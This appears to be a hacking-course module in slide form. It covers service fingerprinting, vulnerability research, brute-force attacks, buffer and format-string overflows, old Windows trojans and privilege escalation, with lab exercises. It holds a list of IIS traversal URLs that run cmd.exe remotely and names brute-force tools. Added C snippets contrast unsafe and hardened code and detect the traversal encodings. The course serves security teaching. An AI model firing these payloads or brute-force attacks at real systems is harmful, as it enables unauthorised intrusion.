System Hacking Section 4
Outline
• Service identification
• Vulnerability identification and research
• Exploits
• Putting it all together
• Target selection in large networks
• Using automated tools
Service Identification Section 4.1
Service Identification
• Common ports
• Banners
• Fingerprinting
Connecting to ports
• Telnet or netcat is the best way to connect to ports
• Many services may be accessed directly
Common ports
Many services can be identified by their common port numbers
Banners
Some services may be better identified by banners:
• telnet on routers (ports 2001, 4001, 6001)
• Web daemons for applications
• Compaq Insight Manager
• Many systems include web configuration interfaces
Fingerprinting
Some services cannot be clearly identified just by connecting to them:
• Netbus on NT uses the same port as an RPC service on Solaris
• Some database connections do not provide an automatic response
Fingerprinting a service may identify what it is, even if it has moved ports
Vulnerability Research Section 4.2
Vulnerability identification and research
• This is the process of mapping the identified security attributes of a system or application to potential vulnerabilities
Several methods to map vulnerabilities:
• Manually map identified systems against publicly available databases such as www.securityfocus.com, www.cert.org and vendor security alerts
• Use public exploit code posted to various security mailing lists or hacker websites, or write your own code
• Use automated vulnerability scanning tools such as Nessus, ISS or whisker
Lab
• Explore the following security sites to identify what vulnerability information would be of use to you for the services you have identified.
• www.securityfocus.com
• General searches on google.com
• www.packetstormsecurity.com
• www.astalavista.box.sk
• www.securiteam.com
Time: 30 minutes
Exploits Section 4.3
Types of exploits
• Remote exploits
• Trojans
• Privilege escalation
Remote Exploits Section 4.3.1
Remote exploits
A ‘remote exploit’ attempts to gain access across the network and without proper authentication.
Examples:
• Brute force authentication attempts
• Attacks bypassing integrity checkers
• Buffer overflows
• Sniffing (to some extent)
Brute force attacks
Most common services attacked:
• Telnet
• FTP
• “R” commands
• Secure Shell
• SNMP community names
• Post Office Protocol (POP)
• HyperText Transport Protocol (HTTP/HTTPS)
• SMB
Common tools used
• Brutus
• Admsnmp
• Admsmb
• TeeNet
• Pwscan.pl
• Thc_hydra
Remote password guessing
• Attempting to connect to an enumerated share such as ADMIN$ or C$ and trying username/password combinations until one works
• A “null session” can be established with the target to obtain valid account names
• Use an automated password guessing tool to brute force the selected shares
Brute force attacks under Windows
Some common services prone to brute force:
• Web
• NetBIOS
• FTP
Brute force attacks under Unix
Some common services prone to brute force:
• telnet
• SSH
• Web
• FTP
• R-commands
Lab
• Use a NetBIOS scanning tool to identify local shares on this network
• Use a brute force tool to attempt access to an account on 10.0.1.120
• Warning! These tools can produce significant traffic and lock accounts.
Time: 30 minutes
Buffer overflow attacks
FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE
• Stack overflows
• Format string overflows
• Heap overflows
• Overflow subverting the control path
Buffer overflow attacks
• Occurs when a user or process attempts to place more data into a buffer than was originally allocated
• Commonly associated with C functions like strcpy(), strcat(), sprintf(), etc.
• Most frequently found where user input is taken and passed into an application
Windows buffer overflows
• Only a few conditions have been revealed to date
• All of them exploited flaws in application programs
• Very common for DoS attacks
Exploits
• Netmeeting 2.x by Cult of the Dead Cow
• NT RAS by Cerberus Information Security
• Winhlp32 by Cerberus Information Security
• IISHack by eEye
• Oracle Web Listener 4.0 by CIS
• Outlook GMT token overrun by Underground Security Systems Research
• IIS .printer
Unix buffer overflows
• Sadmind
• ftp
• SSH
• nfs
Unexpected input
• Bypassing integrity checks
• Gaining access by providing unexpected input
• IIS Unicode
• Web applications
Format string attacks
• Caused by programming errors in the formatted output family of functions, which includes printf() and sprintf()
• Efforts usually focused on SUID root programs
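The two defects from the buffer overflow and format string slides above, each beside its hardened form, as an added C example that is not part of the course material (the function names, NAME_LEN and the greeting format are assumptions for illustration):

```c
#include <stdio.h>
#include <string.h>

#define NAME_LEN 16

/* The defect the slides describe: strcpy() copies until it finds a NUL byte,
 * so a `src` longer than NAME_LEN-1 runs past the end of `dst` and overwrites
 * whatever the compiler placed after it on the stack. Kept for comparison only. */
void copy_name_unsafe(char dst[NAME_LEN], const char *src)
{
    strcpy(dst, src);                     /* no bound on the copy */
}

/* Hardened form: the destination size is part of the contract, and oversize
 * input is rejected instead of silently truncated. Returns 0 on success,
 * -1 if `src` (including its NUL) would not fit in `dst`. */
int copy_name_checked(char *dst, size_t dst_len, const char *src)
{
    size_t n;
    for (n = 0; n < dst_len; n++) {       /* scan no further than dst_len bytes */
        if (src[n] == '\0') {
            memcpy(dst, src, n + 1);      /* includes the terminating NUL */
            return 0;
        }
    }
    return -1;                            /* no NUL within dst_len: would overflow */
}

/* The printf-family defect: if user data becomes the *format* argument, as in
 *     snprintf(out, out_len, user);     -- user supplies "%x %x %n"
 * the conversions read (and with %n write) memory the caller never intended.
 * The fix is a constant format with the user data passed as an argument, so
 * the same "%x%n" text is simply printed literally. Returns the output length. */
int format_greeting_safe(char *out, size_t out_len, const char *user)
{
    return snprintf(out, out_len, "Hello, %s", user);
}
```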
Input validation attacks
• Occurs when a program fails to recognise syntactically incorrect input
• Occurs when a module accepts extraneous input
• Occurs when a module fails to handle missing input fields
• A field-value correlation error occurs
• Common in web applications
IIS vulnerabilities
• Unicode and URL based attacks
• Special tags in HTTP
• Sample scripts to brute force
IIS hacking
• /scripts/root.exe?/c+dir
• /MSADC/root.exe?/c+dir
• /c/winnt/system32/cmd.exe?/c+dir
• /d/winnt/system32/cmd.exe?/c+dir
• /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
• /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
• /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
• /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
• /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
• /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
• /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
• /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
• /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
• /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
• /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
• /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
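A defender's check for the encoded traversal forms listed above, as an added C example that is not part of the course material: it canonicalises a request path the way the flawed IIS decoder effectively did (repeated percent decoding, overlong two-byte sequences collapsed to ASCII, backslash treated as slash) and flags any surviving `..` segment, so it generalises beyond the listed URLs to any such encoding of the separator. The function names and MAX_URL are assumptions.

```c
#include <string.h>
#define MAX_URL 512

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c |= 0x20;                                        /* fold A-F to a-f */
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* One round of %XX decoding (output is never longer than the input). Returns 1 if
 * anything was decoded, so the caller can repeat the round for double-encoded input. */
static int percent_decode_once(const char *in, char *out)
{
    size_t i = 0, o = 0;
    int changed = 0, h, l;
    while (in[i]) {
        if (in[i] == '%' && (h = hexval(in[i + 1])) >= 0 && (l = hexval(in[i + 2])) >= 0) {
            out[o++] = (char)(h * 16 + l); i += 3; changed = 1;
        } else {
            out[o++] = in[i++];
        }
    }
    out[o] = '\0';
    return changed;
}

/* Canonicalise a request path the way the flawed IIS decoder effectively did: decode
 * %XX repeatedly, collapse an overlong two-byte "UTF-8" sequence (lead byte 0xC0/0xC1)
 * to the ASCII byte it smuggles, and treat '\' as '/'. Returns 1 if a ".." segment
 * survives (directory traversal), 0 if not, -1 if the input is too long to evaluate. */
int is_traversal_attempt(const char *url)
{
    char a[MAX_URL], b[MAX_URL];
    size_t i, o, len = strlen(url);
    if (len >= MAX_URL) return -1;
    memcpy(a, url, len + 1);
    for (int r = 0; r < 4 && percent_decode_once(a, b); r++)   /* bounded: at most 4 rounds */
        memcpy(a, b, strlen(b) + 1);
    for (i = 0, o = 0; a[i]; ) {
        unsigned char c = (unsigned char)a[i++];
        if ((c == 0xC0 || c == 0xC1) && a[i])                    /* overlong: keep low 6 bits */
            c = (unsigned char)(((c & 1) << 6) | ((unsigned char)a[i++] & 0x3F));
        a[o++] = (c == '\\') ? '/' : (char)c;
    }
    a[o] = '\0';
    for (i = 0; a[i]; i++)                                       /* ".." as a whole segment */
        if (a[i] == '.' && a[i + 1] == '.' && (i == 0 || a[i - 1] == '/') && (a[i + 2] == '/' || !a[i + 2]))
            return 1;
    return 0;
}
```

Note that the plain `root.exe` requests at the top of the list carry no traversal at all; those need a separate indicator (the request target itself) in your log rules.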
Lab
• Use the provided URLs to roam the filesystem of 10.0.1.120
• What is accessible and what is not?
Time: 10 minutes
Trojan Horses and Backdoors Section 4.3.2
Windows trojans and backdoors
These programs provide unauthorised access to a system without the user’s knowledge:
• Theef
• CDC BackOrifice
• SubSeven
• Moosucker
A great site: http://www.tlsecurity.net
Privilege Escalation Section 4.3.3
Privilege escalation
• Attack used to move from normal user to superuser
• Quest for Administrator
• Quest for root
Quest for Administrator
• Hoovering information
• Getadmin
• Sechole
• Spoofing LPC Port requests
Hoovering information
• Identify further information that will gain higher privileges
• Srvinfo
• Find utility
• regdmp
Getadmin
• Windows NT 4
• Small program written by Konstantin Sobolev
• Adds users to the local admin group
• Hijacks a process called winlogon
• Patched by NT SP3
Sechole
• Similar functionality to getadmin
• Modifies instructions in the memory of the OpenProcess API
• Possible to launch remotely if IIS is running
• Patched by NT SP6a
Spoofing LPC Port Requests
• Vulnerability identified by the RAZOR team at http://razor.bindview.com
• The code takes advantage of a flaw in one function of the Local Procedure Call (LPC) Ports API
Quest for root
• Local buffer overflow
• Symlink
• File descriptor attacks
• Signal handling
• Core-file manipulation
• Shared libraries
• Kernel flaws
• System misconfiguration
• IFS attacks